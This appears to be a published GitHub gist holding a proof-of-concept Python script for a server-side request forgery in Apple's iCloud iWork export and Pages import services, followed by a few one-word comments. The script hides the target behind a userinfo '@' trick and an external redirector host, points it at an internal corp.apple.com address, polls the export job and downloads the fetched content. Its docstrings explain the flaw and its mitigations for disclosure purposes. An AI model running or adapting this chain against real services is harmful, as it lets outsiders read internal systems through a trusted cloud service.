
samwcyo/ssrf Secret

Created Aug 26, 2020
import requests, json
# Session material for the tester's own authenticated iCloud web session.
# All three are blank in the published gist; every request below sends
# `cookies` as the Cookie header and puts clientId / dsId in the query string.
# NOTE(review): dsId looks like the account identifier used in the
# `docws:<dsId>:...` document ids further down - confirm.
cookies = ""
clientId = dsId = ""
def firstStep(url):
    """Submit a store_document export job for `url` and return its job id.

    What a defender should notice about the `url` form field:

    * The caller's URL is not sent directly. It is wrapped as the `url=`
      parameter of a redirector page on a third-party host.
    * That redirector address is appended after an `@` to a string that
      begins `https://p37-mailws.icloud.com:443`. Per RFC 3986 the part
      before `@` is userinfo, so the host a client would really contact is
      the redirector, while a prefix or substring check would see the
      iCloud mail host.

    The gist is titled "ssrf", so presumably the export service fetches
    this URL server-side and follows the redirect; neither is visible in
    this file. The usual mitigations for this class of bug: compare the
    host produced by a real URL parser (never a string prefix), reject
    URLs that carry userinfo, re-validate the destination on every
    redirect hop, and restrict egress from the fetching service.

    NOTE(review): the numeric path segment after `export-ws/` is
    hard-coded here, whereas the later export-ws calls format dsId into
    that position - confirm whether that is intentional.
    """
    redirector_target = "xss.buer.haus/redir.php?url={}".format(url)
    endpoint = "https://p37-iworkexportws.icloud.com/iw/export-ws/10000033657/store_document?build=primary&clientId={}&dsid={}".format(clientId, dsId)
    form_fields = {
        # Allowed-looking host sits in the userinfo position; the real
        # host is whatever follows the '@'.
        "url": "https://p37-mailws.icloud.com:443@{}".format(redirector_target),
        "source": "webmail",
        "build": "primary",
    }
    request_headers = {
        "Content-Type": "application/x-www-form-urlencoded; charset=utf-8",
        "Origin": "https://www.icloud.com",
        "Cookie": cookies,
    }
    response = requests.post(endpoint, data=form_fields, headers=request_headers)
    return json.loads(response.text)["job_id"]
def secondStep():
    """Send the Pages `lookup_by_id` list request; the response is discarded.

    Nothing from this call is used later. Presumably it mirrors a request
    the web client makes at this point in the flow - not verifiable from
    this file.
    """
    endpoint = "https://p37-docws.icloud.com/ws/com.apple.Pages/list/lookup_by_id?clientId={}&document_id=documents&dsid={}".format(clientId, dsId)
    request_headers = {
        "Origin": "https://www.icloud.com",
        "Cookie": cookies,
    }
    requests.get(endpoint, data={}, headers=request_headers)
def thirdStep():
    """Send the Pages document `list` request; the response is discarded.

    Like secondStep, the return value is never read, so this only has an
    effect if the server keeps state between calls (assumption).
    """
    endpoint = "https://p37-docws.icloud.com/ws/com.apple.Pages/list/list?clientId={}&concise=true&document_id=documents&dsid={}&fetch_manifests=false&skipErrors=true".format(clientId, dsId)
    request_headers = {
        "Origin": "https://www.icloud.com",
        "Cookie": cookies,
    }
    requests.get(endpoint, data={}, headers=request_headers)
def fourthStep(jobId):
    """Query `store_document_status` once for `jobId`, ignoring the reply.

    Args:
        jobId: the job id returned by firstStep.
    """
    endpoint = "https://p37-iworkexportws.icloud.com/iw/export-ws/{}/store_document_status?build=primary&clientId={}&dsid={}&job_id={}".format(dsId, clientId, dsId, jobId)
    request_headers = {
        "Origin": "https://www.icloud.com",
        "Cookie": cookies,
    }
    requests.post(endpoint, data={}, headers=request_headers)
def fifthStep(jobId):
    """Ask the export service to move the stored document into Pages.

    Posts `move_stored_document` with the job id and a fixed file name,
    zone and parent folder. The response is not inspected.

    Args:
        jobId: the job id returned by firstStep.
    """
    endpoint = "https://p37-iworkexportws.icloud.com/iw/export-ws/{}/move_stored_document?build=primary&clientId={}&dsid={}".format(dsId, clientId, dsId)
    form_fields = {
        "job_id": jobId,
        # Already percent-encoded in the source; sent as-is in the form.
        "name": "text_0%202.txt",
        "zone": "com.apple.Pages",
        "parent_id": "documents",
        "package": "N",
        "source": "webmail",
        "build": "primary",
    }
    request_headers = {
        "Content-Type": "application/x-www-form-urlencoded; charset=utf-8",
        "Origin": "https://www.icloud.com",
        "Cookie": cookies,
    }
    requests.post(endpoint, data=form_fields, headers=request_headers)
def sixthStep(jobId):
    """Query `store_document_status` for `jobId` and return the raw body.

    Same endpoint as fourthStep, but with a text/plain Content-Type, and
    the response text is handed back so the caller can poll on it.

    Args:
        jobId: the job id returned by firstStep.

    Returns:
        The response body as text (expected to be JSON once the job is
        no longer uploading - see fetchURL).
    """
    endpoint = "https://p37-iworkexportws.icloud.com/iw/export-ws/{}/store_document_status?build=primary&clientId={}&dsid={}&job_id={}".format(dsId, clientId, dsId, jobId)
    request_headers = {
        "Content-Type": "text/plain",
        "Origin": "https://www.icloud.com",
        "Cookie": cookies,
    }
    response = requests.post(endpoint, data={}, headers=request_headers)
    return response.text
def seventhStep(pageId):
    """Start a Pages import of the stored document and return the parsed reply.

    Args:
        pageId: the document id taken from the finished export job.

    Returns:
        The decoded JSON response. eigthPage reads its
        `bootstrap_source_id` and `bootstrap_source_token` keys.
    """
    endpoint = "https://p37-iwmb.icloud.com/iwmb/pages/import?s=5816&clientId={}&version=1010&clientType=G10.1&clientBuildNumber=10B146".format(clientId)
    payload = {
        "document_id": "docws:{}:com.apple.Pages:{}".format(dsId, pageId),
        "language": "en-us",
        "locale": "en-us",
        "timezone": "US/Pacific",
    }
    # The body is JSON (json=...), but the Content-Type header is set
    # explicitly to text/plain, as in the original.
    request_headers = {
        "Content-Type": "text/plain; charset=utf-8",
        "Origin": "https://www.icloud.com",
        "Cookie": cookies,
    }
    response = requests.post(endpoint, json=payload, headers=request_headers)
    return json.loads(response.text)
def eigthPage(data, pageId):
    """Create a Pages document from the import and return the parsed reply.

    Args:
        data: the dict returned by seventhStep; its `bootstrap_source_id`
            and `bootstrap_source_token` values are forwarded unchanged.
        pageId: the document id taken from the finished export job.

    Returns:
        The decoded JSON response. ninthPage reads its `item_id` key.
    """
    endpoint = "https://p37-iwmb.icloud.com/iwmb/pages/create?s=5816&clientId={}&version=1010&clientType=G10.1&clientBuildNumber=10B146".format(clientId)
    payload = {
        "parent_item_id": "documents",
        "name": "text_0 2.pages",
        "bootstrap_source_id": data["bootstrap_source_id"],
        "bootstrap_source_token": data["bootstrap_source_token"],
        # The literal string "null", not a JSON null.
        "delete_import_source_auth_token": "null",
        "import_source_document_id": "docws:{}:com.apple.Pages:{}".format(dsId, pageId),
        "is_import": True,
        "is_open_copy": False,
        "language": "en-us",
        "locale": "en-us",
        "timezone": "US/Pacific",
        "zone": "com.apple.Pages",
    }
    request_headers = {
        "Content-Type": "text/plain; charset=utf-8",
        "Origin": "https://www.icloud.com",
        "Cookie": cookies,
    }
    response = requests.post(endpoint, json=payload, headers=request_headers)
    return json.loads(response.text)
def ninthPage(data):
    """Fetch the manifest of the newly created Pages item.

    Args:
        data: the dict returned by eigthPage; only `item_id` is read.

    Returns:
        The decoded JSON manifest. finalPage reads
        `["webservices"]["documentPath"]` from it.
    """
    # Unlike the other calls, this host has no `p37-` prefix.
    endpoint = "https://iwmb.icloud.com/iwmb/pages/n{}/manifest?version=1010&clientType=G10.1&clientBuildNumber=10B146".format(data["item_id"])
    request_headers = {
        "Origin": "https://www.icloud.com",
        "Cookie": cookies,
    }
    response = requests.get(endpoint, headers=request_headers)
    return json.loads(response.text)
def finalPage(data):
    """Download the document body for the path named in the manifest.

    Args:
        data: the manifest dict returned by ninthPage.

    Returns:
        The response text of the `fetchDocument` call. This is where the
        content retrieved for the original URL would become readable to
        the account holder, which is what turns a blind server-side
        request into one whose response is disclosed (inferred from the
        call order in fetchURL).
    """
    document_path = data["webservices"]["documentPath"]
    endpoint = "https://p37-iwres.icloud.com/iwmb/{}fetchDocument?s=5816&version=1010&clientType=G10.1&clientBuildNumber=10B146".format(document_path)
    request_headers = {
        "Origin": "https://www.icloud.com",
        "Cookie": cookies,
    }
    response = requests.get(endpoint, headers=request_headers)
    return response.text
def find_between(s, first, last):
    """Return the text of `s` between the first `first` and the next `last`.

    Args:
        s: string to search.
        first: opening delimiter.
        last: closing delimiter, searched for only after `first`.

    Returns:
        The substring between the two delimiters, or "" when either
        delimiter is missing.
    """
    opening_at = s.find(first)
    if opening_at == -1:
        return ""
    body_start = opening_at + len(first)
    body_end = s.find(last, body_start)
    if body_end == -1:
        return ""
    return s[body_start:body_end]
def fetchURL(url):
    """Run the whole request sequence for `url` and return the document bytes.

    Order of operations: submit the export job (firstStep), make the two
    list calls and one status call whose replies are ignored, move the
    stored document into Pages, poll the job status, then import, create,
    read the manifest and finally download the document.

    Args:
        url: the address embedded in the export request by firstStep.

    Returns:
        The downloaded document text encoded as UTF-8.

    NOTE(review): the status poll has no delay and no upper bound; it
    spins for as long as the reply contains "uploading". For anyone
    writing detections, the burst of identical store_document_status
    requests per job is the visible side effect.
    """
    jobId = firstStep(url)
    secondStep()
    thirdStep()
    fourthStep(jobId)
    fifthStep(jobId)

    # Poll until the status body no longer mentions "uploading", then
    # take the document id out of the JSON reply.
    while True:
        status_body = sixthStep(jobId)
        if "uploading" not in status_body:
            pageId = json.loads(status_body)["result"]["document_id"]
            break

    import_info = seventhStep(pageId)
    created_item = eigthPage(import_info, pageId)
    manifest = ninthPage(created_item)
    return finalPage(manifest).encode("utf8")
def clean(content):
    """Unescape literal `\\n` sequences and return what sits inside <html>...</html>.

    Args:
        content: the document text returned by fetchURL.

    Returns:
        The text between the first `<html>` and the following `</html>`,
        or "" when either tag is absent.
    """
    # Two-character backslash-n sequences become real newlines first.
    unescaped = content.replace("\\n", "\n")
    return find_between(unescaped, '<html>', '</html>')
# Script entry. The address is an internal corporate hostname, redacted by
# the author; the two commented-out alternatives in the original gist were
# redacted to the same string:
# url = "http://redacted.corp.apple.com:1234/nexus/redacted"
# url = "http://redacted.corp.apple.com:1234/nexus/redacted"
# That an internal host appears here at all is the point of the report: the
# fetching service could reach addresses the public internet cannot, which
# is what egress filtering and destination allow-listing are meant to stop.
url = "http://redacted.corp.apple.com:1234/nexus/redacted"
fetched = fetchURL(url)
# Python 2 print statement, as in the original.
print clean(fetched)

@Luigy-Lemon Luigy-Lemon commented Oct 8, 2020

cheese


@ghost ghost commented Oct 9, 2020

cheezy


@m0nk3y-s3c m0nk3y-s3c commented Oct 11, 2020

cheeze


@zer0yu zer0yu commented Oct 12, 2020

cheesy


@spwn3r49sd3r00 spwn3r49sd3r00 commented Oct 16, 2020

Holy


@starlingvibes starlingvibes commented Oct 19, 2020

Holy
